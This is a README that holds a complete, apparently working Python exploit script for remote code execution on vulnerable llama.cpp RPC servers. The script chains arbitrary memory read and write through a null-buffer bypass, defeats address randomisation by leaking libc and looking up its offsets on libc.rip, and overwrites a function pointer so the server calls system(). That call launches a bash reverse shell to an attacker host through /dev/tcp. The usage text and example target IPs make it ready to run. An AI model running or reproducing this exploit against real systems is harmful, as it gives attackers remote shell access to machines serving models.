README.md
Rendering markdown...
#!/usr/bin/env python3
"""
Linux RCE Exploit — llama.cpp RPC Server b8487
Auther: @casp3r0x0 Hassan Ali
Null-buffer bypass (pre-PR #20908) → arbitrary R/W → Memory-only Reverse Shell
Target: Any vulnerable distributed llama.cpp RPC Server
Run: python3 linux_exploit.py <rpc_host> <rpc_port> <lhost> <lport>
Chain:
1. ALLOC_BUFFER → remote_ptr (ggml_backend_buffer*), buffer_base (data region)
2. Arb-read iface.get_base at remote_ptr+8 → function ptr in libggml-base.so
3. Scan backward for ELF magic → libbase_base
4. Arb-read GOT[memcpy] at libbase_base+0xa8598 → memory leak inside libc
5. Scan backward from memcpy to find libc_base, and extract .note.gnu.build-id
6. Query libc.rip API with the Build-ID to automatically resolve system() offset
7. Write reverse shell string (padded to 56 bytes) + system_addr to buffer_base
8. Arb-write those 64 bytes from buffer_base → remote_ptr (corrupts iface.clear)
9. Trigger RPC_CMD_BUFFER_CLEAR → calls iface.clear(rp) → system("bash -c ...")
"""
import socket
import struct
import sys
import os
import time
# Protocol constants
RPC_CMD_ALLOC_BUFFER = 0
RPC_CMD_BUFFER_GET_BASE = 3
RPC_CMD_SET_TENSOR = 6
RPC_CMD_GET_TENSOR = 8
RPC_CMD_GRAPH_COMPUTE = 10
RPC_CMD_DEVICE_COUNT = 15
RPC_CMD_HELLO = 14
GGML_TYPE_F32 = 0
GGML_OP_NONE = 0
GGML_OP_CPY = 34
GGML_MAX_SRC = 10
TENSOR_BYTES = 296
# Offsets (verified against b8487 build on this system)
# iface.get_base function ptr is in libggml-base.so; scan finds that lib's base
# libggml-base.so GOT slot for memcpy@GLIBC_2.14
BASE_GOT_MEMCPY = 0xa8598
# libc symbol offsets — GOT[memcpy] resolves to the AVX IFUNC implementation
LIBC_OFF_MEMCPY = 0x1a0880 # __memmove_avx_unaligned_erms (IFUNC result on this CPU)
LIBC_OFF_SYSTEM = 0x50d70 # system@@GLIBC_2.2.5
# ggml_backend_buffer iface field offsets
IFACE_FREE_BUFFER = 0x00 # iface.free_buffer — we write command here
IFACE_GET_BASE = 0x08 # iface.get_base — we write system_addr here
class RPCClient:
def __init__(self, host: str, port: int):
self.host = host
self.port = port
self.sock = None
def connect(self):
print(f"[*] Connecting to {self.host}:{self.port}")
self.sock = socket.create_connection((self.host, self.port), timeout=15)
self.sock.sendall(bytes([RPC_CMD_HELLO]))
self.sock.sendall(struct.pack('<Q', 0))
n = struct.unpack('<Q', self._recv_exact(8))[0]
v = self._recv_exact(n)
if len(v) >= 3:
print(f"[+] Server version {v[0]}.{v[1]}.{v[2]}")
def _recv_exact(self, n: int) -> bytes:
buf = bytearray()
while len(buf) < n:
chunk = self.sock.recv(n - len(buf))
if not chunk:
raise ConnectionError(f"Connection closed ({len(buf)}/{n} bytes)")
buf.extend(chunk)
return bytes(buf)
def _send_cmd(self, cmd: int, data: bytes = b''):
self.sock.sendall(bytes([cmd]))
self.sock.sendall(struct.pack('<Q', len(data)) + data)
def _recv_response(self) -> bytes:
n = struct.unpack('<Q', self._recv_exact(8))[0]
return self._recv_exact(n) if n else b''
def alloc_buffer(self, size: int = 0x10000, device: int = 0):
self._send_cmd(RPC_CMD_ALLOC_BUFFER, struct.pack('<IQ', device, size))
r = self._recv_response()
ptr = struct.unpack('<Q', r[:8])[0]
rsz = struct.unpack('<Q', r[8:16])[0]
return ptr, rsz
def get_buffer_base(self, remote_ptr: int) -> int:
self._send_cmd(RPC_CMD_BUFFER_GET_BASE, struct.pack('<Q', remote_ptr))
r = self._recv_response()
return struct.unpack('<Q', r[:8])[0]
def close(self):
if self.sock:
self.sock.close()
# Tensor packing
def _pack_tensor(self, tid: int, buf_ptr: int, data_ptr: int,
op: int, src_ids: list, n_elems: int, flags: int = 0) -> bytes:
nb0 = 4
nb1 = n_elems * 4
d = bytearray()
d += struct.pack('<Q', tid)
d += struct.pack('<I', GGML_TYPE_F32)
d += struct.pack('<Q', buf_ptr)
for v in [n_elems, 1, 1, 1]:
d += struct.pack('<I', v)
for v in [nb0, nb1, nb1, nb1]:
d += struct.pack('<I', v)
d += struct.pack('<I', op)
d += b'\x00' * 64 # op_params
d += struct.pack('<i', flags) # flags
for i in range(GGML_MAX_SRC):
d += struct.pack('<Q', src_ids[i] if i < len(src_ids) else 0)
d += struct.pack('<Q', 0) # view_src
d += struct.pack('<Q', 0) # view_offs
d += struct.pack('<Q', data_ptr) # data
d += b'\x00' * 64 # name
d += b'\x00' * 4 # padding
assert len(d) == TENSOR_BYTES, f"bad tensor size {len(d)}"
return bytes(d)
# Primitives
def arb_read(self, remote_ptr: int, buffer_base: int,
target_addr: int, n_bytes: int) -> bytes:
"""Read n_bytes from target_addr using the null-buffer CPY bypass."""
n_elems = max((n_bytes + 3) // 4, 1)
src = self._pack_tensor(0x3001, 0, target_addr, GGML_OP_NONE, [], n_elems)
dst = self._pack_tensor(0x3002, remote_ptr, buffer_base, GGML_OP_CPY, [0x3001], n_elems, flags=16)
body = struct.pack('<I', 0) # device_id
body += struct.pack('<I', 1) # n_nodes
body += struct.pack('<Q', 0x3002) # node_ids[0]
body += struct.pack('<I', 2) # n_tensors
body += src + dst
# GRAPH_COMPUTE has NO response
self._send_cmd(RPC_CMD_GRAPH_COMPUTE, body)
# Retrieve copied data via GET_TENSOR
rt = self._pack_tensor(0x3002, remote_ptr, buffer_base, GGML_OP_NONE, [], n_elems)
req = rt + struct.pack('<Q', 0) + struct.pack('<Q', n_elems * 4)
self._send_cmd(RPC_CMD_GET_TENSOR, req)
return self._recv_response()
def arb_write(self, remote_ptr: int, buffer_base: int, target_addr: int, n_bytes: int = 16):
"""Write whatever is at buffer_base to target_addr.
Caller must have written the payload to buffer_base first via write_to_buf."""
n_elems = (n_bytes + 3) // 4
src = self._pack_tensor(0x4001, 0, buffer_base, GGML_OP_NONE, [], n_elems)
dst = self._pack_tensor(0x4002, 0, target_addr, GGML_OP_CPY, [0x4001], n_elems, flags=16)
body = struct.pack('<I', 0)
body += struct.pack('<I', 1)
body += struct.pack('<Q', 0x4002)
body += struct.pack('<I', 2)
body += src + dst
# GRAPH_COMPUTE has NO response
self._send_cmd(RPC_CMD_GRAPH_COMPUTE, body)
def write_to_buf(self, remote_ptr: int, buffer_base: int, payload: bytes):
"""Write payload to buffer_base using SET_TENSOR (valid buffer path)."""
n_elems = max((len(payload) + 3) // 4, 1)
tensor = self._pack_tensor(0x5001, remote_ptr, buffer_base, GGML_OP_NONE, [], n_elems)
# SET_TENSOR format: rpc_tensor | offset (8) | data
req = tensor + struct.pack('<Q', 0) + payload
# SET_TENSOR has NO response
self._send_cmd(RPC_CMD_SET_TENSOR, req)
def read_qword(self, rp: int, bb: int, addr: int) -> int:
d = self.arb_read(rp, bb, addr, 8)
return struct.unpack('<Q', d[:8])[0] if len(d) >= 8 else None
def read_dword(self, rp: int, bb: int, addr: int) -> int:
d = self.arb_read(rp, bb, addr, 4)
return struct.unpack('<I', d[:4])[0] if len(d) >= 4 else None
def read_string(self, rp: int, bb: int, addr: int, max_len: int = 256) -> bytes:
d = self.arb_read(rp, bb, addr, max_len)
idx = d.find(b'\x00')
if idx != -1:
return d[:idx]
return d
def find_elf_base(self, rp: int, bb: int, start: int,
label: str, max_steps: int = 0x800) -> int:
"""Scan backwards from start (page-aligned) for ELF magic 0x7f454c46."""
addr = start & ~0xFFF
for step in range(max_steps):
sig = self.read_dword(rp, bb, addr)
if sig == 0x464c457f: # b'\x7fELF'
print(f" [+] {label} base: 0x{addr:016x} (step {step+1})")
return addr
addr -= 0x1000
return None
def find_libc_system_via_buildid(self, rp: int, bb: int, libc_base: int) -> int:
import urllib.request
import json
print("\n[Step 4.5] Leaking libc Build-ID and querying libc.rip...")
# Read the first 0x4000 bytes from libc_base to find the .note.gnu.build-id
head = self.arb_read(rp, bb, libc_base, 0x4000)
pattern = b'\x04\x00\x00\x00\x14\x00\x00\x00\x03\x00\x00\x00GNU\x00'
idx = head.find(pattern)
if idx == -1:
print(" [-] Could not find Build-ID in libc header.")
return None
build_id = head[idx + 16 : idx + 36].hex()
print(f" [+] Found Build-ID: {build_id}")
print(f" [+] Fetching offsets from https://libc.rip ...")
url = 'https://libc.rip/api/find'
data = json.dumps({'buildid': build_id}).encode('utf-8')
req = urllib.request.Request(url, data=data, headers={'Content-Type': 'application/json'})
try:
with urllib.request.urlopen(req, timeout=15) as response:
res = json.loads(response.read().decode('utf-8'))
if res and isinstance(res, list) and len(res) > 0:
lib = res[0]
print(f" [+] Matched libc: {lib['id']}")
if 'system' in lib['symbols']:
sys_off = int(lib['symbols']['system'], 16)
return sys_off
except Exception as e:
print(f" [-] Failed to query API: {e}")
return None
# Main exploit
def exploit(host: str, port: int, lhost: str, lport: int):
client = RPCClient(host, port)
client.connect()
# Stage 1: Allocate a staging buffer
print("\n[Step 1] Allocating staging buffer")
remote_ptr, alloc_sz = client.alloc_buffer(0x10000)
buffer_base = client.get_buffer_base(remote_ptr)
print(f" remote_ptr = 0x{remote_ptr:016x} (ggml_backend_buffer*)")
print(f" buffer_base = 0x{buffer_base:016x} (data region)")
rp, bb = remote_ptr, buffer_base
# Stage 2: Leak function pointer from iface.get_base
print("\n[Step 2] Leaking iface.get_base function pointer")
getbase_ptr = client.read_qword(rp, bb, rp + IFACE_GET_BASE)
print(f" iface.get_base = 0x{getbase_ptr:016x}")
if not getbase_ptr or getbase_ptr < 0x700000000000:
print("[-] Unexpected pointer — check layout")
return
# Stage 3: Find libggml-base.so base
print("\n[Step 3] Scanning backward for ELF magic → libggml-base.so base")
libbase_base = client.find_elf_base(rp, bb, getbase_ptr, "libggml-base.so")
if not libbase_base:
print("[-] Could not find libggml-base ELF base"); return
print(f" libbase_base = 0x{libbase_base:016x}")
# Stage 4: Read GOT[memcpy] to leak libc
print("\n[Step 4] Reading GOT[memcpy] → libc leak")
memcpy_addr = client.read_qword(rp, bb, libbase_base + BASE_GOT_MEMCPY)
print(f" memcpy@libc = 0x{memcpy_addr:016x}")
# We find libc_base dynamically
libc_base = client.find_elf_base(rp, bb, memcpy_addr, "libc.so.6")
if not libc_base:
print("[-] Could not find libc base automatically!")
return
print(f" libc_base = 0x{libc_base:016x}")
# Automatically get system offset by parsing remote memory Build-ID
# and fetching from libc.rip archive database!
sys_offset = client.find_libc_system_via_buildid(rp, bb, libc_base)
if sys_offset:
print(f" [+] Automatically pulled system offset: 0x{sys_offset:x}")
system_addr = libc_base + sys_offset
else:
print(" [!] Falling back to hardcoded system offset.")
system_addr = libc_base + LIBC_OFF_SYSTEM
print(f" [+] Final payload variables:")
print(f" libc_base = 0x{libc_base:016x}")
print(f" system() = 0x{system_addr:016x}")
# Stage 5: Write payload to buffer_base
print("\n[Step 5] Writing payload to buffer_base")
cmd = f'bash -c "bash -i>&/dev/tcp/{lhost}/{lport} 0>&1"'.encode()
if len(cmd) > 55:
print("[-] Payload too long (must be <= 55 chars)!")
return
payload = cmd.ljust(56, b'\x00') + struct.pack('<Q', system_addr)
assert len(payload) == 64
client.write_to_buf(rp, bb, payload)
print(f" payload: {payload}")
# Stage 6: Arb-write payload from buffer_base → remote_ptr
print("\n[Step 6] Corrupting iface via arb-write (buffer_base → remote_ptr)")
client.arb_write(rp, bb, rp, n_bytes=64)
print(" Done — iface.clear now = system()")
# Stage 7: Trigger
print("\n[Step 7] Triggering BUFFER_CLEAR → system(...)")
print(f" [!] Waiting for reverse shell on {lhost}:{lport} ...")
try:
# RPC_CMD_BUFFER_CLEAR = 5
client._send_cmd(5, struct.pack('<QB', rp, 0))
# Server will block in system() and not respond immediately
time.sleep(1)
print(" [+] Trigger command sent! Check your listener.")
except Exception as e:
print(f" Connection closed: {e} (shell spawned — check listener)")
client.close()
if __name__ == '__main__':
if len(sys.argv) < 5:
print(f"Usage: {sys.argv[0]} <rpc_host> <rpc_port> <lhost> <lport>")
print(f" rpc_host — target RPC server IP")
print(f" rpc_port — target RPC server port (default 50052)")
print(f" lhost — your IP for the reverse shell to connect back to")
print(f" lport — your listening port")
print(f"\nExample: {sys.argv[0]} 10.10.10.5 50052 10.10.14.1 4444")
sys.exit(1)
host = sys.argv[1]
port = int(sys.argv[2])
lhost = sys.argv[3]
lport = int(sys.argv[4])
exploit(host, port, lhost, lport)